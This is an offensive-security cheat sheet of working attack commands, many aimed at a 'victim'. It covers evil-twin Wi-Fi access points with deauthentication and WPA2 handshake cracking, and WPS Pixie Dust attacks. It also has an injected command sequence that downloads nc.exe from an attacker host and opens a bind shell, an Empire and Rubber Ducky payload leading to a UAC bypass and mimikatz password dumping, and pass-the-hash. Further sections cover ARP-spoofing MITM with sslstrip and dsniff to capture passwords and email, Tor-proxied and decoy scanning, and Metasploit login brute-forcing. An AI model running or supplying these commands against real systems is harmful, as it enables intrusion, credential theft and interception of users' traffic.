Airbase-ng – Evil Twin

Check wifi interface

  • iwconfig

Turn up the power (only takes effect if the driver and regulatory domain allow it; check the limit with iw reg get)

  • iwconfig wlan0 txpower 27

Start wifi interface

  • airmon-ng start wlan0

Capture data & choose target AP

  • airodump-ng wlan0mon

Create Fake AP (-z 2 advertises WPA1/TKIP; the monitor interface is always the last argument)

  • airbase-ng -c 11 -a 20:34:67:24:89:76 -e FakeAP -v -z 2 wlan0mon

Create Evil Twin AP (-Z 4 advertises WPA2/CCMP; stations that try to join send the first messages of the 4-way handshake, which the capture below records)

  • airbase-ng -a [victim AP MAC] -c 11 -Z 4 --essid VictimAP wlan0mon

Monitor Evil Twin AP (-w takes a file prefix; the capture lands in rogueap-01.cap)

  • airodump-ng --bssid [victim AP MAC] --channel 11 -w /root/Desktop/rogueap wlan0mon

Deauthentication (kicks the client off the real AP so it re-associates, ideally with the stronger evil twin; all three tools share wlan0mon, so keep them on channel 11)

  • aireplay-ng -0 2 -a [router bssid] -c [Client MAC address] wlan0mon

Aircrack

  • aircrack-ng -b [victim AP MAC] -w /usr/share/wordlists/rockyou.txt /root/Desktop/rogueap-01.cap

Custom wordlists

Using John

  • Download target site
    • # wget -r -l 2 www.<targetwebsite>.com
  • Produce uniq list (one token per line, deduplicated)
    • # grep -hr "" www.<targetwebsite>.com/ | tr '[:space:]' '\n' | sort -u > wordlist.lst
  • Clean list (drop empty lines and tokens containing markup or punctuation; a single bracket expression replaces the fragile quoted alternation, which never actually filtered "]")
    • # grep -Ev '[][,;{}<>:="/]|^$' wordlist.lst | sort -u > wordlist.clean.lst
  • Regenerate list w/ John (apply mangling rules; uniq only removes adjacent duplicates, so non-adjacent repeats can remain)
    • # john --wordlist=wordlist.clean.lst --rules --stdout | uniq > final.wordlist.lst

Using Crunch

Syntax: crunch <min> <max> [<charset string>] [-f <charset file> <charset name>] [-t <pattern>] -o <output filename>

  • Mixed-case letters, exactly 8 characters (mixalpha is letters only; use mixalpha-numeric for letters and digits; at 52^8 candidates the output will not fit on disk, so pipe crunch into the cracker instead of using -o)
    • # crunch 8 8 -f /usr/share/rainbowcrack/charset.txt mixalpha -o /root/alphawordlist.lst
  • Password set to 10 chars with the last four fixed (0728) and the first six variable (@ = one lowercase letter)
    • # crunch 10 10 -t @@@@@@0728 -o /root/birthdaywordlist.lst

WPA2 + Aircrack-ng

  1. Show wifi interfaces
    1. airmon-ng
    2. airmon-ng check kill (if the interface doesn't show up correctly or NetworkManager keeps resetting it)
  2. Start wifi interface
    1. airmon-ng start wlan0 (creates wlan0mon; older releases named it mon0)
  3. Scan for wifi networks
    1. airodump-ng wlan0mon
  4. Choose wifi to test
    1. ctrl+c to stop scanning
    2. # airodump-ng -c 11 --bssid [router bssid] -w /root/Desktop/wpa2handshake wlan0mon (-w is a prefix; the capture is written to wpa2handshake-01.cap)
    3. # airodump-ng --ignore-negative-one --bssid [router bssid] -c 11 -w /root/Desktop/wpa2handshake wlan0mon (alternative method if the channel shows as -1)
  5. DeAuth clients on victim AP
    1. # aireplay-ng -0 2 -a [router bssid] -c 40:A6:D9:1F:4A:D3 wlan0mon (-c is the client MAC address)
    2. Wait for "WPA handshake: [router bssid]" to appear in the airodump-ng header
  6. Crack handshake
    1. # aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/wpa2handshake-01.cap

Create txt file remotely to get nc on victim host

Each line goes through whatever injection primitive evaluates exec() on the target (the str$(exec(...)) wrapper is that context; only the cmd.exe command inside it matters). The script logs in to the attacker's FTP server, fetches nc.exe in binary mode, then nc.exe is started as a bind shell. With ftp -n the "user" line reads the password from the next script line, so the password goes on a line of its own (a "pass ..." line would be fed to the password prompt verbatim), and the Windows shell is cmd.exe, not command.exe.

  1. # str$(exec("cmd.exe /c echo user [username] > ftp.txt"))
  2. # str$(exec("cmd.exe /c echo [password] >> ftp.txt"))
  3. # str$(exec("cmd.exe /c echo binary >> ftp.txt"))
  4. # str$(exec("cmd.exe /c echo get nc.exe >> ftp.txt"))
  5. # str$(exec("cmd.exe /c echo disconnect >> ftp.txt"))
  6. # str$(exec("cmd.exe /c echo quit >> ftp.txt"))
  7. # str$(exec("cmd.exe /c ftp -i -n -s:ftp.txt [IP OF ATTACKER PC]"))
  8. # str$(exec("nc.exe -l -p 9999 -e cmd.exe"))

Empire + Ducky

1. Create listener
1a. (Empire) > listeners
1b. (Empire: listeners) > set Name Listener01
1c. (Empire: listeners) > execute
1d. (Empire: listeners) > back
2. Create ducky payload
2a. (Empire) > agents
2b. (Empire: agents) > usestager ducky
2c. (Empire: stager/ducky) > set listener Listener01
2d. (Empire: stager/ducky) > set Outfile /home/ducky.txt
2e. (Empire: stager/ducky) > generate
3. Put payload onto Ducky
3a. Generate the inject.bin file from the Ducky Script in ducky.txt at the Duck Toolkit site
3b. Copy inject.bin to the Ducky
3c. Plug the Ducky into the victim
4. Try to extract login passwords from victim
4a. Wait for the victim to connect back to Empire
4b. (Empire) > agents
4c. (Empire: agents) > list
4d. (Empire: agents) > interact FSDFSGAJ34FGH4
4e. (Empire: FSDFSGAJ34FGH4) > sysinfo
4f. (Empire: FSDFSGAJ34FGH4) > usemodule privesc/bypassuac
4g. (Empire: privesc/bypassuac) > set Listener Listener01
4h. (Empire: privesc/bypassuac) > run
4i. (Empire: privesc/bypassuac) > back * 2
4j. (Empire: agents) > list (a second, elevated agent should have checked in)
4k. (Empire: agents) > interact DSGHFDFSGHJ243J
4l. (Empire: DSGHFDFSGHJ243J) > usemodule credentials/mimikatz/logonpasswords
4m. (Empire: credentials/mimikatz/logonpasswords) > run (must be run from the elevated agent; reading LSASS needs local admin or SYSTEM)

If successful, logon passwords are now revealed in cleartext :)

Tor + proxychains + Kali

  1. Update Kali
    1. apt-get update
  2. Configure apt sources
    1. leafpad /etc/apt/sources.list
      1. add 'deb http://deb.torproject.org/torproject.org wheezy main' (wheezy was the Debian base when these notes were written; use the codename matching your release)
  3. Install Tor gpg keys
    1. gpg --keyserver keys.gnupg.net --recv-keys 886DDD89
    2. gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add -
    3. apt-get update
    4. apt-get install deb.torproject.org-keyring
  4. Install Tor
    1. apt-get install tor
  5. Configure proxychains
    1. leafpad /etc/proxychains.conf
      1. uncomment 'dynamic_chain'
      2. comment out 'strict_chain' (the default mode; only one *_chain directive may be active and there is no 'static_chain')
      3. replace the stock 'socks4 127.0.0.1 9050' at the end of the file with 'socks5 127.0.0.1 9050' (two entries pointing at the same Tor port would make a broken two-hop chain); leave 'proxy_dns' enabled so name lookups go through Tor too
  6. Start Tor
    1. service tor start
  7. Execute proxychains
    1. proxychains nmap -sT -Pn -n 1.2.3.4 (proxychains only wraps libc connect(), so use a TCP connect scan; -sS raw packets, ICMP/ARP host discovery and nmap's own reverse DNS bypass the proxy and leak your address)
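The step 5 edits to /etc/proxychains.conf, scripted so they are repeatable and checked before anything is sent through the tunnel. This is an added example, not part of the original notes: it works on a constructed config that mirrors the stock file layout (CONSTRUCTED_CONF), and the Tor SOCKS port 9050 and the temp-file handling are assumptions for the demo.

```shell
#!/bin/sh
# Added example (not from the original notes): apply the proxychains.conf edits
# as an idempotent script and verify the result. CONSTRUCTED_CONF is a made-up
# sample that mirrors the stock file layout; port 9050 is assumed to be Tor.

CONSTRUCTED_CONF='# proxychains.conf  VER 3.1 (constructed sample)
#dynamic_chain
strict_chain
#random_chain
chain_len = 2
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
# add proxy here ...
socks4 127.0.0.1 9050'

# configure_proxychains FILE: enable dynamic_chain, disable the other chain
# modes, make sure proxy_dns is present before [ProxyList] (options after that
# header are parsed as proxies, not options), retire the stock socks4 Tor entry
# and add one socks5 entry. Every edit is a no-op when already applied.
configure_proxychains() {
    f="$1"
    sed -e 's/^#*[[:space:]]*dynamic_chain[[:space:]]*$/dynamic_chain/' \
        -e 's/^strict_chain/#strict_chain/' \
        -e 's/^random_chain/#random_chain/' \
        -e 's/^[[:space:]]*socks4[[:space:]]*127\.0\.0\.1[[:space:]]*9050/#&/' \
        "$f" > "$f.tmp" && mv "$f.tmp" "$f"
    if ! grep -q '^proxy_dns' "$f"; then
        sed -e '/^\[ProxyList\]/i\
proxy_dns' "$f" > "$f.tmp" && mv "$f.tmp" "$f"
    fi
    if ! grep -Eq '^socks5[[:space:]]+127\.0\.0\.1[[:space:]]+9050' "$f"; then
        printf 'socks5 127.0.0.1 9050\n' >> "$f"
    fi
}

# active_chain_mode FILE: print the chain-mode directive(s) currently enabled.
active_chain_mode() {
    grep -E '^(dynamic|strict|random)_chain[[:space:]]*$' "$1"
}

# proxy_list FILE: print the live (uncommented, non-empty) proxy entries.
proxy_list() {
    sed -n '/^\[ProxyList\]/,$p' "$1" | grep -Ev '^(#|\[|[[:space:]]*$)'
}

# check_proxychains FILE: succeed only if exactly one chain mode (dynamic) is
# active, proxy_dns is set, and the proxy list is a single socks5 Tor entry.
check_proxychains() {
    f="$1"
    [ "$(active_chain_mode "$f")" = "dynamic_chain" ] || return 1
    grep -q '^proxy_dns' "$f" || return 1
    [ "$(proxy_list "$f" | grep -Ec '^socks5[[:space:]]+127\.0\.0\.1[[:space:]]+9050')" -eq 1 ] || return 1
    [ "$(proxy_list "$f" | grep -c .)" -eq 1 ] || return 1
}

# Demo on a scratch copy (real use: configure_proxychains /etc/proxychains.conf as root,
# then check_proxychains /etc/proxychains.conf before running proxychains).
demo() {
    tmp=$(mktemp)
    printf '%s\n' "$CONSTRUCTED_CONF" > "$tmp"
    configure_proxychains "$tmp"
    configure_proxychains "$tmp"   # second run must change nothing
    if check_proxychains "$tmp"; then
        echo "proxychains.conf OK: $(active_chain_mode "$tmp") via $(proxy_list "$tmp")"
    else
        echo "proxychains.conf NOT in the expected state" >&2
    fi
    rm -f "$tmp"
}
demo
```

The check matters more than the edit: proxychains silently falls back to a direct connection when its config is malformed or the proxy list is empty, so confirm the single socks5 entry and proxy_dns before trusting the tunnel.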

Aircrack-ng + reaver + pixiewps

Prereqs:

  • Kali Linux
  • Do an "apt-get update && apt-get dist-upgrade -y" in your Kali Linux machine

1) Install reaver

root@kali:~# apt-get install reaver aircrack-ng

2) Put your interface in monitor mode:

root@kali:~# airmon-ng start wlan0

Note: You should now have a monitor interface named 'wlan0mon'

3) Identify AP in-scope for testing

root@kali:~# airodump-ng wlan0mon --wps

Note: Identify the in-scope AP's MAC address (BSSID), the channel it runs on, and check in the WPS column that WPS is enabled and not locked

4) Run reaver with gathered info

root@kali:~# reaver -i wlan0mon -c 11 -b 12:34:56:78:90:12 -K 1

5) Behold pixiewps magic

-K 1 runs the Pixie Dust attack; if the AP's WPS implementation is affected you're presented with the WPS PIN and the WPA PSK within seconds, thanks Kali, reaver & pixiewps ... that's what I call an alliance of power

mimikatz

PASSWD (sekurlsa::* reads LSASS, so run mimikatz from an elevated prompt and enable the debug privilege first)

mimikatz # privilege::debug

mimikatz # sekurlsa::logonpasswords

Kerberos (writes every cached ticket to .kirbi files in the current directory)

mimikatz # sekurlsa::tickets /export

PassTheHash (starts a new process whose logon session carries the given NTLM hash; the default program is cmd.exe, /run:<program> picks another)

mimikatz # sekurlsa::pth /user:Administrator /domain:domain.local /ntlm:cc36cf7a8514893efccd332446158b1a

MiTM

1. Configure ip forwarding on attacker host (without this the victim's traffic is dropped and the spoof turns into a denial of service)

echo "1" > /proc/sys/net/ipv4/ip_forward

2. Redirection of http traffic to sslstrip
2a. iptables -t nat -A PREROUTING -i eth0 -p tcp --destination-port 80 -j REDIRECT --to-port 8000
2b. iptables-save > /etc/iptables.rules (iptables-save only prints the current rules; redirect to a file if you want to restore them later)

3. SSLStrip (listens on the port the REDIRECT rule points at; sites with HSTS, and preloaded ones in particular, will not be stripped)
sslstrip -k -l 8000 -w encrypted.txt

4. Ettercap (targets use ettercap's /IP// notation)
ettercap -Tq -i eth0 -M arp:remote /<victim_ip>// /<gateway_ip>//

5. Arpspoof
5a. Single host > arpspoof -i eth0 -r -t <victim_ip> <gateway_ip> (-r poisons both directions)
5b. Whole net > arpspoof -i eth0 <gateway_ip>

6. Urlsnarf - capture http
urlsnarf -i eth0

7. Driftnet - capture images
driftnet -i eth0

8. Dsniff - capture passwords
dsniff -i eth0 -w plaintext.txt

9. Mailsnarf - capture emails
mailsnarf -i eth0

nmap

Scan methodology

  1. Scan for live hosts

    1. nmap -sn -oA subnet_live 192.168.1.0/24
  2. Parse list w/ live hosts (filter on "Status: Up" so the "# Nmap ..." header and footer lines don't end up in the target list)

    1. grep 'Status: Up' subnet_live.gnmap | awk '{print $2}' > subnet_live_parsed
  3. Scan hosts for app ver. of top 500 ports (-sS and -O need root)

    1. nmap -sS -sV -O --min-parallelism 400 --max-parallelism 512 --script banner.nse,http-headers --top-ports 500 -iL subnet_live_parsed -oA subnet_live_top500
  4. Parse lists for top vuln. ports (in .gnmap each port is preceded by a space and followed by /open/, so anchor on both: a bare "grep 80/open" also matches 8080 and 1080, and "21/open" matches 2121)

    1. All found
      1. grep -E ' (21|22|80|81|85|88|443|1433|3128|3306|5900|8080)/open/' subnet_live_top500.gnmap | awk '{print $2}' > subnet_live_top_vulnports
    2. FTP
      1. grep -E ' 21/open/' subnet_live_top500.gnmap | awk '{print $2}' > subnet_live_ftp
    3. SSH
      1. grep -E ' 22/open/' subnet_live_top500.gnmap | awk '{print $2}' > subnet_live_ssh
    4. MSSQL
      1. grep -E ' 1433/open/' subnet_live_top500.gnmap | awk '{print $2}' > subnet_live_mssql
    5. MYSQL
      1. grep -E ' 3306/open/' subnet_live_top500.gnmap | awk '{print $2}' > subnet_live_mysql
    6. VNC
      1. grep -E ' 5900/open/' subnet_live_top500.gnmap | awk '{print $2}' > subnet_live_vnc
    7. HTTP
      1. grep -E ' 80/open/' subnet_live_top500.gnmap | awk '{print $2}' > subnet_live_http
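The parsing steps of the methodology above as reusable shell functions, run against a constructed piece of grepable output so the difference between an anchored and a substring port match is visible. This is an added example, not from the original notes: the scan output, addresses and service versions are made up, and the subnet_live_* file names follow the notes' convention.

```shell
#!/bin/sh
# Added example (not from the original notes): parse nmap grepable output
# (-oG, or the .gnmap file from -oA) into per-service target lists without the
# substring pitfalls of a bare "grep 80/open". Both scan outputs below are
# constructed for the demo; addresses and versions are not real.

CONSTRUCTED_LIVE='# Nmap 7.94 scan initiated Mon Jan  1 00:00:00 2024 as: nmap -sn -oA subnet_live 192.168.1.0/24
Host: 192.168.1.1 ()    Status: Up
Host: 192.168.1.10 ()   Status: Up
Host: 192.168.1.11 ()   Status: Down
# Nmap done at Mon Jan  1 00:00:05 2024 -- 256 IP addresses (2 hosts up) scanned in 5.00 seconds'

CONSTRUCTED_TOP500='# Nmap 7.94 scan initiated Mon Jan  1 00:01:00 2024 as: nmap -sS -sV --top-ports 500 -iL subnet_live_parsed -oA subnet_live_top500
Host: 192.168.1.1 ()    Status: Up
Host: 192.168.1.1 ()    Ports: 22/open/tcp//ssh//OpenSSH 8.9/, 80/open/tcp//http//nginx/, 2121/open/tcp//ftp//ProFTPD/  Ignored State: closed (497)
Host: 192.168.1.10 ()   Status: Up
Host: 192.168.1.10 ()   Ports: 21/open/tcp//ftp//vsftpd 3.0.3/, 1433/open/tcp//ms-sql-s//Microsoft SQL Server 2019/, 8080/filtered/tcp//http-proxy///     Ignored State: closed (497)
# Nmap done at Mon Jan  1 00:03:00 2024 -- 2 IP addresses (2 hosts up) scanned in 120.00 seconds'

# live_hosts GNMAP_TEXT: IPs reported as up. Filtering on "Status: Up" drops the
# "# Nmap ..." comment lines (whose second field, "Nmap", a bare awk '{print $2}'
# would write into the target list) and drops hosts that are down.
live_hosts() {
    printf '%s\n' "$1" | grep 'Status: Up' | awk '{print $2}'
}

# hosts_with_open_port GNMAP_TEXT PORTS: IPs with any of PORTS open on TCP.
# PORTS is an ERE alternation such as '21' or '21|22|80'. In the Ports: field
# every entry is "<port>/<state>/<proto>/..." and is preceded by a space, so
# anchoring on " (PORTS)/open/" means 80 cannot match 8080 or 1080, 21 cannot
# match 2121, and a filtered or closed port is never reported as open.
hosts_with_open_port() {
    printf '%s\n' "$1" | grep -E " ($2)/open/" | awk '{print $2}' | sort -u
}

# naive_hosts_with_port GNMAP_TEXT PORT: the unanchored grep from the notes,
# kept only to show what it over-matches.
naive_hosts_with_port() {
    printf '%s\n' "$1" | grep "$2/open" | awk '{print $2}' | sort -u
}

# Demo: the same per-service split as the methodology, written into a scratch
# directory (real use: hosts_with_open_port "$(cat subnet_live_top500.gnmap)" 21).
demo() {
    out=$(mktemp -d)
    live_hosts "$CONSTRUCTED_LIVE" > "$out/subnet_live_parsed"
    hosts_with_open_port "$CONSTRUCTED_TOP500" '21|22|80|81|85|88|443|1433|3128|3306|5900|8080' > "$out/subnet_live_top_vulnports"
    for svc in ftp:21 ssh:22 mssql:1433 mysql:3306 vnc:5900 http:80; do
        hosts_with_open_port "$CONSTRUCTED_TOP500" "${svc#*:}" > "$out/subnet_live_${svc%%:*}"
    done
    for f in "$out"/subnet_live_*; do
        printf '%s: %s\n' "$(basename "$f")" "$(tr '\n' ' ' < "$f")"
    done
    printf 'naive "grep 21/open" would also list: %s\n' "$(naive_hosts_with_port "$CONSTRUCTED_TOP500" 21 | tr '\n' ' ')"
    rm -rf "$out"
}
demo
```

With the constructed data the naive FTP grep lists 192.168.1.1 because of its 2121/open entry, while the anchored match returns only 192.168.1.10; the same anchoring keeps the filtered 8080 on 192.168.1.10 out of the HTTP list.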

Metasploit scans of found hosts & their respective ports

  1. FTP scan :: msf > use auxiliary/scanner/ftp/ftp_login
  2. SSH scan :: msf > use auxiliary/scanner/ssh/ssh_login
  3. MSSQL scan :: msf > use auxiliary/scanner/mssql/mssql_login
  4. SNMP scan :: msf > use auxiliary/scanner/snmp/snmp_login, then auxiliary/scanner/snmp/snmp_enum with the community string it finds
  5. MYSQL scan :: msf > use auxiliary/scanner/mysql/mysql_login
  6. VNC scan :: msf > use auxiliary/scanner/vnc/vnc_login

Top Ports

nmap -sS -sV -O --min-parallelism 400 --max-parallelism 512 --script banner.nse,http-headers --top-ports 500 192.168.1.1

Search for BMC Vuln

nmap -p 49152 -n -oA ./bmc_vuln --min-parallelism 512 --min-rate 400 -Pn 192.168.1.0/24 (-oA takes a basename and writes .nmap, .gnmap and .xml)

Search for MSSQL

  • nmap -sV -p T:1433 -n -oG ./scans/mssql_tcp_1433_scan.txt -Pn --min-parallelism 512 --min-rate 400 [ip_range]
  • nmap -p 1433 -oG ./scans/mssql_tcp_1433_scan.txt --script ms-sql-info --script-args mssql.instance-port=1433 --min-parallelism 512 --min-rate 400 [ip_range]

Web server enumeration
nmap -sV --script=http-enum [target_ip]

Check for vulns. (smb-check-vulns was removed in Nmap 7; its checks live in the smb-vuln-* scripts; quote the glob so the shell doesn't expand it)
nmap --script='smb-vuln*' -p445 [target_ip]

dns-blacklist
nmap -sn [target_ip] --script=dns-blacklist

SQLi (the script is http-sql-injection; it spiders the site and tests GET parameters with error-based payloads)
nmap -T4 -A -v --script=http-sql-injection [target_ip]

Decoy scan
nmap -D RND:10 [target_ip]

nmap -D decoy1,decoy2,etc [target_ip]

Live hosts
nmap -sn [target_net]

Host scan (-Pn skips host discovery entirely, so a -PS probe alongside it is pointless)
nmap -sS -Pn -n [target_ip]

Host service scan
nmap -sS -Pn -n -A [target_ip]

Hosts down (-v makes down hosts appear in the grepable output)
nmap -v -sn -oG - [target_net] | grep Down